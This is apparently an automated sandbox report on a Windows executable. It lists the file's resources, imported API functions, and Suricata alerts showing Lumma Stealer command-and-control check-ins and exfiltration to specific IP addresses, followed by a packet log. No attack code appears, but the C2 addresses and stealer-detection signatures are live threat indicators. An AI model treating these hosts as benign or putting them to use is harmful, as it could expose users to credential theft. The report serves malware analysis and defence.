                                                                                                                                                                                                                              RT_CURSOR0x7ca1900x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                              RT_CURSOR0x7ca2c40x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                              RT_CURSOR0x7ca3f80x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                              RT_CURSOR0x7ca52c0x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                              RT_CURSOR0x7ca6600x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                              RT_CURSOR0x7ca7940x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                              RT_CURSOR0x7ca8c80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                              RT_ICON0x7ca9fc0x26126PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9963255569378359
                                                                                                                                                                                                                              RT_STRING0x7f0b240x2f4data0.44047619047619047
                                                                                                                                                                                                                              RT_STRING0x7f0e180x448data0.3759124087591241
                                                                                                                                                                                                                              RT_STRING0x7f12600x9d0data0.2921974522292994
                                                                                                                                                                                                                              RT_STRING0x7f1c300xa10data0.23951863354037267
                                                                                                                                                                                                                              RT_STRING0x7f26400x808data0.14688715953307394
                                                                                                                                                                                                                              RT_STRING0x7f2e480x858data0.14887640449438203
                                                                                                                                                                                                                              RT_STRING0x7f36a00x898data0.1390909090909091
                                                                                                                                                                                                                              RT_STRING0x7f3f380x7a8data0.16887755102040816
                                                                                                                                                                                                                              RT_STRING0x7f46e00x944data0.12310286677908938
                                                                                                                                                                                                                              RT_STRING0x7f50240x9f4data0.12676609105180534
                                                                                                                                                                                                                              RT_STRING0x7f5a180x554data0.31085043988269795
                                                                                                                                                                                                                              RT_STRING0x7f5f6c0x370data0.42045454545454547
                                                                                                                                                                                                                              RT_STRING0x7f62dc0x3a4data0.3465665236051502
                                                                                                                                                                                                                              RT_STRING0x7f66800x320data0.43625
                                                                                                                                                                                                                              RT_STRING0x7f69a00x454data0.36101083032490977
                                                                                                                                                                                                                              RT_STRING0x7f6df40x300data0.3619791666666667
                                                                                                                                                                                                                              RT_STRING0x7f70f40x428data0.39473684210526316
                                                                                                                                                                                                                              RT_STRING0x7f751c0xd8data0.6666666666666666
                                                                                                                                                                                                                              RT_STRING0x7f75f40xd0data0.6634615384615384
                                                                                                                                                                                                                              RT_STRING0x7f76c40x310data0.44642857142857145
                                                                                                                                                                                                                              RT_STRING0x7f79d40x3acdata0.3840425531914894
                                                                                                                                                                                                                              RT_STRING0x7f7d800x3e0data0.3810483870967742
                                                                                                                                                                                                                              RT_STRING0x7f81600x50cdata0.32739938080495357
                                                                                                                                                                                                                              RT_STRING0x7f866c0x410data0.3317307692307692
                                                                                                                                                                                                                              RT_STRING0x7f8a7c0x218data0.2294776119402985
                                                                                                                                                                                                                              RT_STRING0x7f8c940x43cdata0.42066420664206644
                                                                                                                                                                                                                              RT_STRING0x7f90d00x418data0.37786259541984735
                                                                                                                                                                                                                              RT_STRING0x7f94e80x4d0data0.3741883116883117
                                                                                                                                                                                                                              RT_STRING0x7f99b80x474data0.3201754385964912
                                                                                                                                                                                                                              RT_STRING0x7f9e2c0x378data0.40765765765765766
                                                                                                                                                                                                                              RT_STRING0x7fa1a40x3b8data0.328781512605042
                                                                                                                                                                                                                              RT_STRING0x7fa55c0x40cdata0.3735521235521235
                                                                                                                                                                                                                              RT_STRING0x7fa9680xf4data0.5491803278688525
                                                                                                                                                                                                                              RT_STRING0x7faa5c0xc4data0.6275510204081632
                                                                                                                                                                                                                              RT_STRING0x7fab200x280data0.4859375
                                                                                                                                                                                                                              RT_STRING0x7fada00x434data0.3308550185873606
                                                                                                                                                                                                                              RT_STRING0x7fb1d40x360data0.3912037037037037
                                                                                                                                                                                                                              RT_STRING0x7fb5340x2dcdata0.3770491803278688
                                                                                                                                                                                                                              RT_STRING0x7fb8100x318data0.33080808080808083
                                                                                                                                                                                                                              RT_RCDATA0x7fbb280x10data1.5
                                                                                                                                                                                                                              RT_RCDATA0x7fbb380x233Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States0.9680284191829485
                                                                                                                                                                                                                              RT_RCDATA0x7fbd6c0x148bPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0020916524054002
                                                                                                                                                                                                                              RT_RCDATA0x7fd1f80x111ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025102692834322
                                                                                                                                                                                                                              RT_RCDATA0x7fe3180xd8cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0031718569780854
                                                                                                                                                                                                                              RT_RCDATA0x7ff0a40x10e0data0.5018518518518519
                                                                                                                                                                                                                              RT_RCDATA0x8001840x4dataEnglishUnited States3.0
                                                                                                                                                                                                                              RT_RCDATA0x8001880x14d2Delphi compiled form 'TfmInfo'0.9380863039399625
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x80165c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_CURSOR0x8016d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                              RT_GROUP_ICON0x8016e80x14dataEnglishUnited States1.1
                                                                                                                                                                                                                              RT_VERSION0x8016fc0x2e4dataEnglishUnited States0.4797297297297297
                                                                                                                                                                                                                              RT_MANIFEST0x8019e00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              winmm.dlltimeGetTime
                                                                                                                                                                                                                              winspool.drvDocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
                                                                                                                                                                                                                              comctl32.dllImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
                                                                                                                                                                                                                              shell32.dllShell_NotifyIconW, SHAppBarMessage, ShellExecuteW, ShellExecuteExW
                                                                                                                                                                                                                              user32.dllCopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, CharLowerBuffA, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, InsertMenuItemW, MonitorFromRect, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, DestroyMenu, SetWindowsHookExW, EmptyClipboard, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, CopyIcon, CharUpperBuffA, PostQuitMessage, ShowScrollBar, LoadImageW, EnableMenuItem, HideCaret, FindWindowExW, LoadIconW, SystemParametersInfoW, MonitorFromPoint, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
                                                                                                                                                                                                                              version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                                                                                                              oleaut32.dllSafeArrayPutElement, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantChangeType
                                                                                                                                                                                                                              WTSAPI32.DLLWTSUnRegisterSessionNotification, WTSRegisterSessionNotification
                                                                                                                                                                                                                              advapi32.dllRegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegOpenKeyExA, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegFlushKey, RegEnumValueW, RegQueryValueExW, RegQueryValueExA, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
                                                                                                                                                                                                                              msvcrt.dllmemcpy, memset
                                                                                                                                                                                                                              kernel32.dllSetFileAttributesW, GetFileType, SetFileTime, QueryDosDeviceW, GetACP, GetExitCodeProcess, GetStringTypeExW, CloseHandle, LocalFree, GetCurrentProcessId, GetSystemDefaultLangID, SizeofResource, UpdateResourceW, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetLongPathNameW, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, SystemTimeToTzSpecificLocalTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, GetFileAttributesExW, LoadLibraryExW, TerminateProcess, LockResource, BeginUpdateResourceW, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, GetStringTypeExA, LoadResource, SuspendThread, GetTickCount, EnumResourceLanguagesW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, GlobalLock, SetThreadPriority, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, CompareStringA, QueryPerformanceCounter, SetEndOfFile, InitializeCriticalSectionAndSpinCount, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, SystemTimeToFileTime, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetLocalTime, WaitForSingleObject, GetOEMCP, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, TzSpecificLocalTimeToSystemTime, IsValidLocale, SleepEx, TlsSetValue, EndUpdateResourceW, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                                                                                                                                              SHFolder.dllSHGetFolderPathW
                                                                                                                                                                                                                              ole32.dllIsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
                                                                                                                                                                                                                              gdi32.dllAddFontMemResourceEx, Pie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, CreateDCW, PolyBezierTo, CreateICW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, RemoveFontResourceExW, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, GetKerningPairs, CreateEnhMetaFileW, Arc, SelectPalette, SetGraphicsMode, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, GetGlyphOutlineW, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, AddFontResourceExW, Rectangle, SaveDC, DeleteDC, GetWorldTransform, BitBlt, SetWorldTransform, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, CombineRgn, SetWinMetaFileBits, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, RemoveFontMemResourceEx, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries

                                                                                                                                                                                                                              Exports

                                                                                                                                                                                                                              NameOrdinalAddress
                                                                                                                                                                                                                              __dbk_fcall_wrapper20x412764
                                                                                                                                                                                                                              dbkFCallWrapperAddr10x948644

                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2024-11-18T00:15:22.667750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649704172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:23.279515+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1649704172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:23.279515+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649704172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:24.184664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649706172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:24.725081+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1649706172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:24.725081+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649706172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:25.926360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649707172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:27.372592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649708172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:28.840912+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649709172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:30.463927+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649710172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:31.771417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649711172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:32.288914+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1649711172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:33.112356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649712172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:34.414146+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649713172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:35.490437+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649714172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:36.027674+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649714172.67.131.254443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:36.680327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649715172.67.185.54443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:38.963659+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649716172.67.185.54443TCP
                                                                                                                                                                                                                              2024-11-18T00:15:43.503073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649717172.67.185.54443TCP

                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.059462070 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.059515953 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.059592009 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.061153889 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.061168909 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.667655945 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.667749882 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.672029972 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.672045946 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.672297955 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.718561888 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.721067905 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.721067905 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.721168041 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.279458046 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.279571056 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.279673100 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.280502081 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.280520916 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.280535936 CET49704443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.280540943 CET44349704172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.345854044 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.345918894 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.346014977 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.346385002 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:23.346398115 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.184564114 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.184664011 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.186126947 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.186137915 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.186367989 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.188064098 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.188090086 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.188154936 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725069046 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725132942 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725158930 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725179911 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725192070 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725212097 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725259066 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725276947 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725366116 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725815058 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725862980 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725903034 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.725915909 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.768569946 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.768595934 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.816550016 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844048977 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844094992 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844151020 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844161034 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844232082 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844346046 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844367027 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844377041 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844383001 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844393015 CET49706443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:24.844396114 CET44349706172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.290524960 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.290563107 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.290771961 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.291152954 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.291169882 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.926285028 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.926359892 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.927867889 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.927875996 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.928076029 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.929600000 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.929764986 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:25.929800034 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.534557104 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.534804106 CET44349707172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.534809113 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.534862995 CET49707443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.769602060 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.769654989 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.769736052 CET49708443192.168.2.16172.67.131.254
